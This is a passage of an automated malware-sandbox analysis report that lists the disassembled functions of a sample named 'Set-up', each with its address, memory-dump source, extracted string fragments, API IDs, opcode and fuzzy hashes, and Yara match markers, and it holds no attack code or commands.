                                                                                                                                                  Function 006A56BE Relevance: 2.7, Strings: 2, Instructions: 239COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: x%mQ$x%mQ
                                                                                                                                                  • API String ID: 0-1495539218
                                                                                                                                                  • Opcode ID: f2932739af46d31b482c0e034ae73f49789bb41d95a57dcf2167687f2f17db2a
                                                                                                                                                  • Instruction ID: d949050654218dce96cb74ea6c7584d6a49a4e4ff747ba415026227fe6301887
                                                                                                                                                  • Opcode Fuzzy Hash: f2932739af46d31b482c0e034ae73f49789bb41d95a57dcf2167687f2f17db2a
                                                                                                                                                  • Instruction Fuzzy Hash: 186167B3D28B2D9BD324EBA48C416A6B2C7A7D1310F1A803C9955D7224FEB4ED058BC4
                                                                                                                                                  Function 006A7B1E Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: B)D+$BC@
                                                                                                                                                  • API String ID: 0-242265201
                                                                                                                                                  • Opcode ID: 5810fb67d60a6922ca9b72c650af589ad312a4e7d15ab79f99cd30bbf590e66b
                                                                                                                                                  • Instruction ID: 82b41d24f6adb552edf19779aa9b51bf57aab901c97a30138eceffcdfa996c52
                                                                                                                                                  • Opcode Fuzzy Hash: 5810fb67d60a6922ca9b72c650af589ad312a4e7d15ab79f99cd30bbf590e66b
                                                                                                                                                  • Instruction Fuzzy Hash: 537106B16093408BD714AF25CC927ABB7E2EFD2350F189A2CF4D28B395E7748905CB16
                                                                                                                                                  Function 006AE5CA Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: q$tHm;
                                                                                                                                                  • API String ID: 0-3195134334
                                                                                                                                                  • Opcode ID: e6ca35c72551195a904eb94b12e3331f65add8ccd973acfb646a5c1c20313ad1
                                                                                                                                                  • Instruction ID: ed5a827fa1ca2ea1da02e2992176ce8fbbd0fce0b4c0a3e1043bfe1a6589744b
                                                                                                                                                  • Opcode Fuzzy Hash: e6ca35c72551195a904eb94b12e3331f65add8ccd973acfb646a5c1c20313ad1
                                                                                                                                                  • Instruction Fuzzy Hash: 23516A21B593928BD724CE28C8512A6FBD29F97350F1C8B7DD485CB382D62ADC46DB81
                                                                                                                                                  Function 006969B5 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: L4$L4
                                                                                                                                                  • API String ID: 0-3214460456
                                                                                                                                                  • Opcode ID: 176ccb59b00b1f4c57e813a011d0ab3ff015854823138f04e37729a6c997bb88
                                                                                                                                                  • Instruction ID: e5da785d69ac6f30894974f989383b1f9d6ffe8e1b4e45caf1fe679634daab96
                                                                                                                                                  • Opcode Fuzzy Hash: 176ccb59b00b1f4c57e813a011d0ab3ff015854823138f04e37729a6c997bb88
                                                                                                                                                  • Instruction Fuzzy Hash: 33418B71708350AFDB748B34C8817AB73DBE787320F28C67CD5E5932A5CA7548018746
                                                                                                                                                  Function 0068DF56 Relevance: 2.6, Strings: 2, Instructions: 124COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: T5Z$@F
                                                                                                                                                  • API String ID: 0-1663730460
                                                                                                                                                  • Opcode ID: 7bb07898d893a9a7511860b0270143328b38be7a7105ce0ffa51880a8ee0bd66
                                                                                                                                                  • Instruction ID: 599df0c741c1289816f60e5213430f52825c99a3f91f1b6a9542ed192d61eceb
                                                                                                                                                  • Opcode Fuzzy Hash: 7bb07898d893a9a7511860b0270143328b38be7a7105ce0ffa51880a8ee0bd66
                                                                                                                                                  • Instruction Fuzzy Hash: 7A314871A10611CBCB28DF64CC61A7BBBF2FF1A310B044A5CD993AB7A0E775A911CB54
                                                                                                                                                  Function 006A2507 Relevance: 2.2, Strings: 1, Instructions: 981COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ZE
                                                                                                                                                  • API String ID: 0-2401159496
                                                                                                                                                  • Opcode ID: 6274ac996d43755873142d5e7e0c02cedc72199d70d448bd18e6ed6c70e19d79
                                                                                                                                                  • Instruction ID: 6faba0a45d9e40289af692a9816f186f0dc23cb84a2146d6bd92f2de7ee92465
                                                                                                                                                  • Opcode Fuzzy Hash: 6274ac996d43755873142d5e7e0c02cedc72199d70d448bd18e6ed6c70e19d79
                                                                                                                                                  • Instruction Fuzzy Hash: 9C428EB19417128FC724DF28C8A26B7B7B2FF96320B19925CD8515F7A5E3789C42CB90
                                                                                                                                                  Function 006BD04E Relevance: 2.0, Strings: 1, Instructions: 731COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: f
                                                                                                                                                  • API String ID: 0-1993550816
                                                                                                                                                  • Opcode ID: 0206b89cd4b27240f56a973a1ecc0134f7c296126eac7c7d7fa51d2f64523d1e
                                                                                                                                                  • Instruction ID: 38547dd3e0571edaa06bb9ac3fd8e0272756f11a2e9915c4e502ca22bb62bcbb
                                                                                                                                                  • Opcode Fuzzy Hash: 0206b89cd4b27240f56a973a1ecc0134f7c296126eac7c7d7fa51d2f64523d1e
                                                                                                                                                  • Instruction Fuzzy Hash: 4532F6B16083518FC714CF28C8906EAB7E2EBD5314F188A3DE4959B391EB74ED49CB52
                                                                                                                                                  Function 004484C0 Relevance: 1.9, Strings: 1, Instructions: 670COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: YA1
                                                                                                                                                  • API String ID: 0-613462611
                                                                                                                                                  • Opcode ID: 8f9d64a353e9de0981ae008bbcbec3ce6a8ac3d75701b825e9dbc8acfec05411
                                                                                                                                                  • Instruction ID: 3e01aac92955970f5735e0fddf26befdc9cacdc491a354c90cb0e17caf0d3bdc
                                                                                                                                                  • Opcode Fuzzy Hash: 8f9d64a353e9de0981ae008bbcbec3ce6a8ac3d75701b825e9dbc8acfec05411
                                                                                                                                                  • Instruction Fuzzy Hash: 4642E3716083818FE715DF28C49066FBBE2BFD9308F15496EE8D59B342DA35D806CB86
                                                                                                                                                  Function 00427B6F Relevance: 1.9, APIs: 1, Instructions: 375COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00427B74
                                                                                                                                                    • Part of subcall function 0046BBC0: RaiseException.KERNEL32(?,?,R@,?,?,?,0047D380,?,?,?,004052E0), ref: 0046BBEE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionH_prologRaise
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3968804221-0
                                                                                                                                                  • Opcode ID: 146aa2f2bae7cca06786e7aa9bb6d52b681f378b5af7c056180967db33aa5c73
                                                                                                                                                  • Instruction ID: 7bdba7281a5ef191f6de1b2616db926ee0d4e1942b1f03b703baf98ed8d85473
                                                                                                                                                  • Opcode Fuzzy Hash: 146aa2f2bae7cca06786e7aa9bb6d52b681f378b5af7c056180967db33aa5c73
                                                                                                                                                  • Instruction Fuzzy Hash: 09E1E171A046158FDB24CFAAD991BBFB3B1FF84304F60451EE156A7291DB38A941CB18
                                                                                                                                                  Function 0042D8F7 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                                  • Opcode ID: 5367a829db225ba9196aa01da696c3d34d247c6fe27324312736986d08480250
                                                                                                                                                  • Instruction ID: f5851c86fb7cceddfae6fbd05108904ae35dd0f4342f7e955ecbd883554d3eda
                                                                                                                                                  • Opcode Fuzzy Hash: 5367a829db225ba9196aa01da696c3d34d247c6fe27324312736986d08480250
                                                                                                                                                  • Instruction Fuzzy Hash: 59A13C70E002299FCF18DF55D8919AEBBB2FF94314F64842FE415A7251DB38AD81CB98
                                                                                                                                                  Function 00446690 Relevance: 1.7, Strings: 1, Instructions: 496COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2
                                                                                                                                                  • API String ID: 0-450215437
                                                                                                                                                  • Opcode ID: f382717dabccb1821824e153fcca422795ebc3336d060cbb808f7591659f2e4b
                                                                                                                                                  • Instruction ID: f9bf1c0cf2a4ddef6206a7cd71aedb1fb0810f37d230011d15ed04a4a11ea5f9
                                                                                                                                                  • Opcode Fuzzy Hash: f382717dabccb1821824e153fcca422795ebc3336d060cbb808f7591659f2e4b
                                                                                                                                                  • Instruction Fuzzy Hash: 4D02C0716043518BE718DF28C59026AF7E2EFCA308F16493ED8D6D7341DA38E945CB8A
                                                                                                                                                  Function 006A429E Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 3
                                                                                                                                                  • API String ID: 0-2413921980
                                                                                                                                                  • Opcode ID: 05c19ff6726476ee0320274f3c9a3043fc9ac59af8fca7a67d42e60de4980951
                                                                                                                                                  • Instruction ID: 99dcd0d5e156e3f08fa1f627130f6d142953233a7efddae2f75e035d071862ed
                                                                                                                                                  • Opcode Fuzzy Hash: 05c19ff6726476ee0320274f3c9a3043fc9ac59af8fca7a67d42e60de4980951
                                                                                                                                                  • Instruction Fuzzy Hash: 81C12871A053109BD714AF25CC936BBB3E2EFD2320F19952CE88587381EBB8DD058B56
                                                                                                                                                  Function 006985F9 Relevance: 1.6, Strings: 1, Instructions: 365COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: b7T5
                                                                                                                                                  • API String ID: 0-422268914
                                                                                                                                                  • Opcode ID: 645e445cd815fbe41812df44e756fe9f888effd397defde51146f7dd8540b6cd
                                                                                                                                                  • Instruction ID: 02fa87e622776b4ba98c744432471c69a95be6424bde6383ab01a27bea3d6cef
                                                                                                                                                  • Opcode Fuzzy Hash: 645e445cd815fbe41812df44e756fe9f888effd397defde51146f7dd8540b6cd
                                                                                                                                                  • Instruction Fuzzy Hash: 38A135366043128FCB28CF28C4916BBB7E2EFD5350F29896DD8C58B795EB349942C781
                                                                                                                                                  Function 004593B0 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: YA1
                                                                                                                                                  • API String ID: 0-613462611
                                                                                                                                                  • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                                                                                                                  • Instruction ID: d330078268b2bf131ec12a9f9d9b2269f80da05b55ca2d271592046d6ed1162d
                                                                                                                                                  • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                                                                                                                  • Instruction Fuzzy Hash: 80D1E1715046168FD729CF1CC494236BBE1FF86305F094ABEDA968B386D7389E19CB48
                                                                                                                                                  Function 006A85AE Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-1614059158
                                                                                                                                                  • Opcode ID: 89edcbe7c58724df343bf675901047d7e23873d06ad15ac2c74802853c50c0b8
                                                                                                                                                  • Instruction ID: 6e70b2a16dc8908c09dd97ec44985ff4153a38ffbb96937c63f91227636b693e
                                                                                                                                                  • Opcode Fuzzy Hash: 89edcbe7c58724df343bf675901047d7e23873d06ad15ac2c74802853c50c0b8
                                                                                                                                                  • Instruction Fuzzy Hash: 9D9127B6A043115FD718AB65CC927BB73A3FBC2314F29852CE5824B341EE74ED068B95
                                                                                                                                                  Function 0068A68E Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ^U
                                                                                                                                                  • API String ID: 0-2128660318
                                                                                                                                                  • Opcode ID: bfec9e98d857a89caa99cf8c6826c5154b32f630ebaa204f7443d06cce904c98
                                                                                                                                                  • Instruction ID: d1fea55af88345821c1eb2ad7dfafb6d970355c204f99a9814430ce98dc2079a
                                                                                                                                                  • Opcode Fuzzy Hash: bfec9e98d857a89caa99cf8c6826c5154b32f630ebaa204f7443d06cce904c98
                                                                                                                                                  • Instruction Fuzzy Hash: AC812E3160C3824BEB09DF39846037AFFE29FD3214F1985ADE4D597396D639890A8752
                                                                                                                                                  Function 006B324E Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: d
                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                  • Opcode ID: 484a0b90ce1c8e5636339b5c0889c010d68a2d20c2db72709ad8cd7ad5d78d38
                                                                                                                                                  • Instruction ID: 06f995ddad20c977df6812e787be37eb792dee3c9501cf0c0d793f4358611b15
                                                                                                                                                  • Opcode Fuzzy Hash: 484a0b90ce1c8e5636339b5c0889c010d68a2d20c2db72709ad8cd7ad5d78d38
                                                                                                                                                  • Instruction Fuzzy Hash: 8A910C77B59AA007D32C993C4C622EABAC34BD7330F2DC77DA5B58B3E5D96849454340
                                                                                                                                                  Function 0069587E Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: M;
                                                                                                                                                  • API String ID: 0-3037055635
                                                                                                                                                  • Opcode ID: f79d1ede9cfe65ded3bd0ff3d248eb7c7607cf6c69a08866558a1506528d48c3
                                                                                                                                                  • Instruction ID: 0e34c5082d8228dd90e60cd06e9485ccc8406159064aa110cd33f8c1359a4571
                                                                                                                                                  • Opcode Fuzzy Hash: f79d1ede9cfe65ded3bd0ff3d248eb7c7607cf6c69a08866558a1506528d48c3
                                                                                                                                                  • Instruction Fuzzy Hash: 1461F16090471487DB259F28D8E26B7B3F5EF52324F18461CE8879B791F378D905C36A
                                                                                                                                                  Function 006AA302 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: *+
                                                                                                                                                  • API String ID: 0-2181965719
                                                                                                                                                  • Opcode ID: 44fbe2f06857dfe1bd2ab26994c5d7704707b928ec6d00b9d3c8d2846275c43e
                                                                                                                                                  • Instruction ID: 5429bb3bf282f05ab185426e3ac9a6c902a23258b8b7f1e25cd3f9c0423991c6
                                                                                                                                                  • Opcode Fuzzy Hash: 44fbe2f06857dfe1bd2ab26994c5d7704707b928ec6d00b9d3c8d2846275c43e
                                                                                                                                                  • Instruction Fuzzy Hash: F491C17264C3668BD729CF29884169FF7F2EBC1300F05C92DE4D99B245DB78950A8BC2
                                                                                                                                                  Function 006876CE Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ,
                                                                                                                                                  • API String ID: 0-3772416878
                                                                                                                                                  • Opcode ID: 641c535ca8412967089331af0d044e18475cfaee7d8b1a7010998a249a2deaac
                                                                                                                                                  • Instruction ID: c8706aefa77055d9ff7b512de96bd8263b2fb4ace28416738fc20e354acf46de
                                                                                                                                                  • Opcode Fuzzy Hash: 641c535ca8412967089331af0d044e18475cfaee7d8b1a7010998a249a2deaac
                                                                                                                                                  • Instruction Fuzzy Hash: 61B1487010C3819FD324DF28C98065BFBE1AFA9704F584A2DE5D997342D631EA08CBA7
                                                                                                                                                  Function 0069EC9E Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                                                                  Download Yara Rule
